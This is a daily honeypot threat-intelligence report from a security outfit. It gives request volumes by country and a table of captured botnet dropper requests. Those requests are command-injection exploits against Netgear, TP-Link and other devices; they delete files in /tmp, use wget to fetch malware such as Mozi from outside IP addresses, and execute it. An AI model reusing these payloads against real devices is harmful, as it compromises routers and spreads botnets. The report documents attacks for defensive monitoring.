Skip to main content
  1. Daily-Posts/

Report: 2025-05-02

·307 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-02
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 3 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1407 requests were recorded during the day, originating from 6 different countries, with a peak of 371 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
INGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
59.92.90.159GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.92.90.159:42184/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
104.236.3.45GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1
199.203.206.147GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://162.240.157.77/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
199.203.206.147GET /shell?cd+/tmp;rm+-rf+*;wget+http://162.240.157.77/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
45.95.147.209GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1
24.96.184.50GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://24.96.184.50:39342/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2411\x00\x0E\x08\xC4\x00\xCA\xC7\x01\xB2\x87\x92\x00\x00\x00\x00\x00
2421\x00\x0E8\xC4\x00\xCA\xC7\x01\xB2\x87\x92\x00\x00\x00\x00\x00
3031pim&ipv=0

country_iso_code
#

number_of_occurencecountry_iso_code
0371US
1307NL
2279GB
3103SC
480HK
549DE
642PL
718FR
817CN
914UA
1013IN
1113JP
1211CA
1311ZA
1411GH
157AO
166MN
175KR
185IL
195BE
205AZ
214TR
224BG
233VN
243SG
253PT
262RU
272AU
282RO
292IT
302TW
311PA
321IR
331ES
341TH
351CZ
361NZ
371BR
381PK

Related

Report: 2025-05-01
·9460 words
Repport Daily
Report: 2025-04-30
·681 words
Repport Daily
Report: 2025-04-29
·472 words
Repport Daily